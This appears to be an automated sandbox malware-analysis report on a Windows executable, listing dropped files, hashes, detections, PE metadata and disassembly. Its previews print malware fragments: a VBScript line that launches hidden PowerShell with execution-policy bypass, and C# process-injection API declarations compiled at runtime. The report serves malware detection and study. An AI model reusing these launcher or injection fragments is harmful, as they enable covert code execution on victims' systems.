                                SHA-256:412521617535A8AF32B1A00364BB99A9B87E7AD9D5EB34EFAE03427BE1A7E60D
                                SHA-512:010A85584FE6CE005557DFF01A4DA96C0A02A4A4394F9102449E88425477ACC7BBBB1BDB3938077ADE02D0D04C43E89E1B7DF4DD15FFBE9FF1F52E52C6FD089A
                                Malicious:true
                                Preview:Set objShell = CreateObject("WScript.Shell")..objShell.Run "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File """ & WScript.Arguments(0) & """", 0
                                Process:C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exe
                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                Category:dropped
                                Size (bytes):7888896
                                Entropy (8bit):7.974064364113542
                                Encrypted:false
                                SSDEEP:196608:iIwWEqkZFbTzTCqOTwlzhhR9OZxMER+jzL:iPWEnZFbeq0wlVj9OZFUf
                                MD5:9318C82DAD52D0591436302A1DB63173
                                SHA1:8748191262F5873EA43E1E995D047FAF11C8CF04
                                SHA-256:ACAA7F2A46CB1B171B4E723360FFDD9ACF3DBEFD23C1C20D6EADB6DFC96974C5
                                SHA-512:DD083628F8322862D20E1AD13FFD72588344D9C62C8EAD80F6167C20EB3E6E6E220B37DEDF6D195EFD4434A969C9EAAA8854A89FADCB7FC32A9BD7AF297EE738
                                Malicious:true
                                Antivirus:
                                • Antivirus: Avira, Detection: 100%
                                • Antivirus: ReversingLabs, Detection: 50%
                                Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......&.@.b...b...b...).+....).-.i.....-.j...).(.c.....*.A...)./.i...b./.......+.[...).*.v.....'.`.......c.......c...b...c.....,.c...Richb...........................PE..d...L..g.........." ..........r...............................................x...........`.............................................L......d.......p.p.....d>............x.X...@...p.......................(....................................................text............................... ..`.rdata...".......$..................@..@.data....:......."..................@....pdata..d>.......@..................@..@.gfids.......P......................@..@.tls.........`......................@....gxfg....$...p...&..................@..@.gehcont ............B..............@..@.rsrc...p.p.......p..D..............@..@.reloc..X.....x......Nx.............@..B................................................
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):64
                                Entropy (8bit):1.1510207563435464
                                Encrypted:false
                                SSDEEP:3:Nlllul9kLZ:NllUG
                                MD5:087D847469EB88D02E57100D76A2E8E4
                                SHA1:A2B15CEC90C75870FDAE3FEFD9878DD172319474
                                SHA-256:81EB9A97215EB41752F6F4189343E81A0D5D7332E1646A24750D2E08B4CAE013
                                SHA-512:4682F4457C1136F84C10ACFE3BD114ACF3CCDECC1BDECC340A5A36624D93A4CB3D262B3A6DD3523C31E57C969F04903AB86BE3A2C6B07193BF08C00962B33727
                                Malicious:false
                                Preview:@...e.................................,..............@..........
                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                File Type:MSVC .res
                                Category:dropped
                                Size (bytes):652
                                Entropy (8bit):3.0910044856711916
                                Encrypted:false
                                SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryRXYak7YnqqQXNPN5Dlq5J:+RI+ycuZhNMakS4PNnqX
                                MD5:143815E814959CAA3632D7FCBF624056
                                SHA1:1668646495C11BE7A3B7BDFC32C3D26CEFAD44CA
                                SHA-256:D19D1C4B3576C2E827B7EC4FBB6A44EC54855419BF85F69EFA2EC41DB2062E66
                                SHA-512:041F871F45CC023AC7A40DE8A2F44AED57AE302FF5E02B0021083747013B4392166ABDD09B6E394F05BA32A4ABABAC07802B7930E6DD38DD284BF9F95F7BA37C
                                Malicious:false
                                Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...s.p.o.x.i.y.r.j...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...s.p.o.x.i.y.r.j...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                File Type:MSVC .res
                                Category:dropped
                                Size (bytes):652
                                Entropy (8bit):3.125443491624306
                                Encrypted:false
                                SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryNDGak7YnqqmDXPN5Dlq5J:+RI+ycuZhNqakSSPNnqX
                                MD5:31CE6B0F0E2ADCBE90CB9660F187CCE3
                                SHA1:3AE51313466F7E384BA8E8748C842F7C3DFD9454
                                SHA-256:8AC8701F89365986192D758BBCF8EBBBB6E5BAD20CF0CED55BCFBADAA563C75D
                                SHA-512:5664186F29C2D55113A3F9CCD43BB77F94F0434DC57B121D1BE9C6A4BDBA196BD360368F14C65A74F17B85F1A0F1929B3AF0406D31FD9A4AACDD4AB039491629
                                Malicious:false
                                Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...i.c.z.y.5.v.w.k...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...i.c.z.y.5.v.w.k...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x482, 9 symbols, created Mon Oct 28 10:44:48 2024, 1st section name ".debug$S"
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):3.987316266546504
                                Encrypted:false
                                SSDEEP:24:H1nW9Qju6UuHRwKdNII+ycuZhNqakSSPNnqShgd:x5ju6UuaKdu1ulqa3+qSy
                                MD5:14B73DAE93DAE85B41DBC22FD62E4F7E
                                SHA1:AB0467095E113FF317D43F4BD5C970123467FA98
                                SHA-256:E79CBD095FC6063A3831AC06A3D2F1C8B1570351B271B783E0208EF519725FA2
                                SHA-512:6C98C8AE57E3E40F1571C5291919CA3EB8F69407A5B3920FD8D57F06C405751B866A0E80CC3CBE4A757B23E4EB32747FEAB735D985EEF42C1B177952B22D3391
                                Malicious:false
                                Preview:L... k.g.............debug$S........D...................@..B.rsrc$01........X.......(...........@..@.rsrc$02........P...2...............@..@........J....c:\Users\user\AppData\Local\Temp\CSCD0EB64BB52C94309A29EE6B778E205.TMP.................1.k..*...`.............5.......C:\Users\user\AppData\Local\Temp\RESC35E.tmp.-.<....................a..Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...i.c.z.y.5.v.w.k...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.
                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x482, 9 symbols, created Mon Oct 28 10:44:54 2024, 1st section name ".debug$S"
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):3.97536365345198
                                Encrypted:false
                                SSDEEP:24:HJ5nW9BiTwuHBMwKdNII+ycuZhNMakS4PNnqShgd:pNsiTwuhTKdu1ulMa3AqSy
                                MD5:7470721E0F857F5C68E8E0155DF222EA
                                SHA1:8E7C205DDF7910E81F3C2825B3BB3A94A67B609D
                                SHA-256:0B4FD54E0929A5DAAF70FDEDE17555337EC84B140C69485119305E7B7BA77F88
                                SHA-512:C3A4CAA5E7FDC4CE384B64F9CB473233FCF3BAACD8576B25AFB3A237BA927E0EE063C27F21628437856A0DF214CA1E632351B9B64169C86A957402A0825D5EBC
                                Malicious:false
                                Preview:L...&k.g.............debug$S........D...................@..B.rsrc$01........X.......(...........@..@.rsrc$02........P...2...............@..@........L....c:\Users\user\AppData\Local\Temp\CSC30DB8E40DC954A908A17CE354256952F.TMP................8......62...b@V..........5.......C:\Users\user\AppData\Local\Temp\RESDA71.tmp.-.<....................a..Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...s.p.o.x.i.y.r.j...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1170
                                Entropy (8bit):5.064767530463548
                                Encrypted:false
                                SSDEEP:24:JoCtK4uI5mZTz7sV+MfwztLqtsmPyLuw9g3HsTxC:JoCtK4uI5MTz7sUMfitmbouw9goxC
                                MD5:3FA19360E09832C3D711D4FE71911EAE
                                SHA1:55A86C45AF0F33419DB93C39AAAE09A06F610C78
                                SHA-256:92A6B697B5BC2E42C280074823E06C1F39EFC36FD985FEFF938B4F071756D28B
                                SHA-512:880ABC257E440799CBC718B39D776127E2A683CB5FFE4EBE426240AA52D7FBF6A4982B66B536388A88B00ED810088DC80B47E94297D24DB89C1E2A92C982EC84
                                Malicious:false
                                Preview:.using System;..using System.Runtime.InteropServices;....public class WinAPI..{.. [DllImport("kernel32.dll", SetLastError = true)].. public static extern IntPtr OpenProcess(int processAccess, bool bInheritHandle, uint processId);.... [DllImport("kernel32.dll", SetLastError = true)].. public static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);.... [DllImport("kernel32.dll", SetLastError = true)].. public static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, uint nSize, ref IntPtr lpNumberOfBytesWritten);.... [DllImport("kernel32.dll", SetLastError = true)].. public static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, ref IntPtr lpThreadId);.... [DllImport("kernel32.dll", SetLastError = true)].. public static extern bool CloseHandle(In
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (350), with no line terminators
                                Category:dropped
                                Size (bytes):353
                                Entropy (8bit):5.256730866133055
                                Encrypted:false
                                SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2923fjX+zxs7+AEszI923fjDn:p37Lvkmb6Kzj+WZE2vn
                                MD5:C2182BFA36D7CD7CEF71798DF91327D5
                                SHA1:E9AE3033B9276FE770993BD68B5C2611B90CE2C3
                                SHA-256:DB035C6D211FEBD58420CC138F9B79241D17D6385A95711D5977AEB071247261
                                SHA-512:F36585540D9A4913AE5C404BE276877D82EDEF754668D3959A37148CF46B47E4DBD85B63266FCC4CE553BFE09E9827B1A7E4ED8B2E459C85A825021B9B9E74F7
                                Malicious:true
                                Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\iczy5vwk.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\iczy5vwk.0.cs"
                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:dropped
                                Size (bytes):4096
                                Entropy (8bit):3.065497817114651
                                Encrypted:false
                                SSDEEP:48:6oD7rXuQ/VV7mkuzzNMuJi37vY81ulqa3+q:Br+QLdY/8K
                                MD5:680F6AF67C0020F96BA7BC571689535F
                                SHA1:90E3D51012955BE211378FE78B6FD84AC393CFDF
                                SHA-256:4A2A76DDCB8A3A7275E425978EC115481A79C3B4CEE09C180F4DFA4B59F50E82
                                SHA-512:C24E819EC2997E07A74B3B64D877FA5CB968B19D941B203FC387A51372441FE0CFF70741B473DA134A9B1CD21CD6B10FFC2F92ECCB21BBA4CE9ED1CE084D6537
                                Malicious:true
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L... k.g...........!.................%... ...@....... ....................................@..................................%..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................%......H.......X ..T.............................................................(....*BSJB............v4.0.30319......l.......#~..h...P...#Strings............#US.........#GUID...........#Blob...........W.........%3......................................................................'...............0...............................V.5...V.H...V.S.......... j............ v.&.......... ../.......... ..:.......... ..F...P ........K.......................................................
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (429), with CRLF, CR line terminators
                                Category:modified
                                Size (bytes):850
                                Entropy (8bit):5.318659619210777
                                Encrypted:false
                                SSDEEP:24:AId3ka6KzrE2vuKax5DqBVKVrdFAMBJTH:Akka6arE2vuK2DcVKdBJj
                                MD5:CB9CC360F610636068C4F823068D558D
                                SHA1:7C50F9C57B76519B79BDE4C5C23085463960C996
                                SHA-256:2776CC038C5F104B0D9BC1858A9D0C33092276FF589ECCC47E99C3A88D42F40B
                                SHA-512:8EE02A2AE6E6B44C5CAD608C767904827E1EBEB5A4407D7D1BE632BF1164FD6AD6E26FD7E631092CF4B39BCDCC71A80F3E0F2CA337D2458F9F9B370945AB61DD
                                Malicious:false
                                Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\iczy5vwk.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\iczy5vwk.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1170
                                Entropy (8bit):5.064767530463548
                                Encrypted:false
                                SSDEEP:24:JoCtK4uI5mZTz7sV+MfwztLqtsmPyLuw9g3HsTxC:JoCtK4uI5MTz7sUMfitmbouw9goxC
                                MD5:3FA19360E09832C3D711D4FE71911EAE
                                SHA1:55A86C45AF0F33419DB93C39AAAE09A06F610C78
                                SHA-256:92A6B697B5BC2E42C280074823E06C1F39EFC36FD985FEFF938B4F071756D28B
                                SHA-512:880ABC257E440799CBC718B39D776127E2A683CB5FFE4EBE426240AA52D7FBF6A4982B66B536388A88B00ED810088DC80B47E94297D24DB89C1E2A92C982EC84
                                Malicious:false
                                Preview:.using System;..using System.Runtime.InteropServices;....public class WinAPI..{.. [DllImport("kernel32.dll", SetLastError = true)].. public static extern IntPtr OpenProcess(int processAccess, bool bInheritHandle, uint processId);.... [DllImport("kernel32.dll", SetLastError = true)].. public static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);.... [DllImport("kernel32.dll", SetLastError = true)].. public static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, uint nSize, ref IntPtr lpNumberOfBytesWritten);.... [DllImport("kernel32.dll", SetLastError = true)].. public static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, ref IntPtr lpThreadId);.... [DllImport("kernel32.dll", SetLastError = true)].. public static extern bool CloseHandle(In
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (350), with no line terminators
                                Category:dropped
                                Size (bytes):353
                                Entropy (8bit):5.218933603171431
                                Encrypted:false
                                SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2923f30zxs7+AEszI923fB:p37Lvkmb6KzP0WZE2J
                                MD5:7D50223B3619196D169AE176B618A672
                                SHA1:382632CD34394735093AE9312FF282F55E26D2BF
                                SHA-256:5FEF7529EDC8DC8636405307BEA24E205FBF9414FD5096883EAC2D6169F8FAEE
                                SHA-512:D7D7A42D93FEBED34786CB08F7513F0C4E22AF312CB2D7D92508FAC3A6FE1CE1FDA4A98B95475087C1099774ED0A3568F4B0B0DA7210928ADC244C1B9AC6031E
                                Malicious:false
                                Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\spoxiyrj.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\spoxiyrj.0.cs"
                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:dropped
                                Size (bytes):4096
                                Entropy (8bit):3.0589816265846963
                                Encrypted:false
                                SSDEEP:48:6XiD7rXuQ/fV7mkuzzNMuJk7MY81ulMa3Aq:3r+Q1gY/6K
                                MD5:47DEB890CB61D0EF63375F98A3D47E43
                                SHA1:1778C80E06EE5F4C0B0EA92628272C531E6489AC
                                SHA-256:38F49237636DE946368A354DF2605FD5902E42306D597D91421B807109141886
                                SHA-512:A3302DA6DB2BBABDD79BF9D548487410AE93E00B3EE74B85200CEE6E6B6AF7E36F27214E6BA4FB1C95E12BA1C33262963B7B553431BC56C546FC49933585CC32
                                Malicious:true
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...&k.g...........!.................%... ...@....... ....................................@..................................%..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................%......H.......X ..T.............................................................(....*BSJB............v4.0.30319......l.......#~..h...P...#Strings............#US.........#GUID...........#Blob...........W.........%3......................................................................'...............0...............................V.5...V.H...V.S.......... j............ v.&.......... ../.......... ..:.......... ..F...P ........K.......................................................
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (429), with CRLF, CR line terminators
                                Category:modified
                                Size (bytes):850
                                Entropy (8bit):5.307069615205582
                                Encrypted:false
                                SSDEEP:12:xKIR37Lvkmb6KzP0WZE2MKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:AId3ka6KzdE2MKax5DqBVKVrdFAMBJTH
                                MD5:ED5C22BBB091A38AA95AA6B1EC62A626
                                SHA1:8D81BCE9D070EF25C86DB2D025A4A6C4761AF121
                                SHA-256:CFBB22376DF4F3042F0346FF60663CFF09129B10C0E9B1BC179622B2BB217410
                                SHA-512:D5422BAA35F907981886AD4B3F055B236969B6155969E8B21B92EA61A9851643AE4A0E4279394EDC6B50B4BD212FA57BDA4C10DA41BD0C035D0368F92DCEFBC9
                                Malicious:false
                                Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\spoxiyrj.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\spoxiyrj.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                Process:C:\Windows\System32\WerFault.exe
                                File Type:MS Windows registry file, NT/2000 or above
                                Category:dropped
                                Size (bytes):1835008
                                Entropy (8bit):4.422336430353071
                                Encrypted:false
                                SSDEEP:6144:uSvfpi6ceLP/9skLmb0OTdWSPHaJG8nAgeMZMMhA2fX4WABlEnNl0uhiTw:NvloTdW+EZMM6DFyP03w
                                MD5:70059ABC5DFEF0529B94B4F370A39D02
                                SHA1:55B45CDD7B12B29FDE9694824CCB9090513DE687
                                SHA-256:0950ABAFFB43F3525A3C3EEFB9B58BBC5A7D45EAB64C59F32554E511E0EF7962
                                SHA-512:1FB8478C3D8A0A9DC1386705DCEFF16B49F4FF14F4D840270E3140F07A06C5BBC97E78D62AF6D36B20F8E23A7155BBBE701615E3FD681DD7EF2C602B8BC8DE41
                                Malicious:false
                                Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.s...)..............................................................................................................................................................................................................................................................................................................................................E...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                File type:PE32+ executable (GUI) x86-64, for MS Windows
                                Entropy (8bit):7.973818497491259
                                TrID:
                                • Win64 Executable GUI (202006/5) 92.65%
                                • Win64 Executable (generic) (12005/4) 5.51%
                                • Generic Win/DOS Executable (2004/3) 0.92%
                                • DOS Executable Generic (2002/1) 0.92%
                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                File name:SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exe
                                File size:8'467'456 bytes
                                MD5:58819721cbc16ea7033be23e69bd2058
                                SHA1:77659fce36b96a2b0de0f7079e057fd711900887
                                SHA256:ff7d03accac70da489c7f108fa7d7d5fb58e02bcc32f4933ed418451663cc74a
                                SHA512:210127d72c1bf8986e720724d2881c861ed335469a904a6567ee7310b3501ca4a29f0d57a97a20b32f6ac9ccd1f48653ef27cb46e75df9348a16354a4d9e165f
                                SSDEEP:196608:VDJEXA2kauB2cZGgCgdjZeakFao8FaPsCsCDCRo0bxjU/vHjqjkrx:V0lkau8EG+UBCaUCnDCe0bG/vHZ
                                TLSH:6F862344354947FAF459E834057291A1E7B3BC269B22EB8B2790612FDF632F25F35322
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......C!.B.@...@...@..L8...@..L8...@..L8...@.......@......=@......#@..L8...@..L8...@...@..n@.......@....[..@...@3..@.......@..Rich.@.
                                Icon Hash:1f1d9d1d67661183
                                Entrypoint:0x14002c154
                                Entrypoint Section:.text
                                Digitally signed:false
                                Imagebase:0x140000000
                                Subsystem:windows gui
                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                Time Stamp:0x670E8C61 [Tue Oct 15 15:38:09 2024 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:6
                                OS Version Minor:0
                                File Version Major:6
                                File Version Minor:0
                                Subsystem Version Major:6
                                Subsystem Version Minor:0
                                Import Hash:72a5ce0c0a3d6f27f94d6e1307a5a6d7
Instruction (entry-point disassembly, re-decoded as x64: the report's listing decoded this PE32+ image in 32-bit mode, which renders each REX prefix as an inc/dec of a 32-bit register and movsxd as arpl; branch targets are the sandbox's computed addresses)
sub rsp, 28h
call 00007F19F0D9E824h
add rsp, 28h
jmp 00007F19F0D9DE17h
int3
int3
sub rsp, 28h
mov r8, qword ptr [r9+38h]
mov rcx, rdx
mov rdx, r9
call 00007F19F0D9DFA2h
mov eax, 00000001h
add rsp, 28h
ret
int3
int3
int3
push rbx
mov r11d, dword ptr [r8]
mov rbx, rdx
and r11d, FFFFFFF8h
mov r9, rcx
test byte ptr [r8], 00000004h
mov r10, rcx
je 00007F19F0D9DFA5h
mov eax, dword ptr [r8+08h]
movsxd r10, dword ptr [r8+04h]
neg eax
add r10, rcx
movsxd rcx, eax
and r10, rcx
movsxd rax, r11d
mov rdx, qword ptr [rax+r10]
mov rax, qword ptr [rbx+10h]
mov ecx, dword ptr [rax+08h]
add rcx, qword ptr [rbx+08h]
test byte ptr [rcx+03h], 0000000Fh
je 00007F19F0D9DF9Ch
movzx eax, byte ptr [rcx+03h]
and eax, FFFFFFF0h
add r9, rax
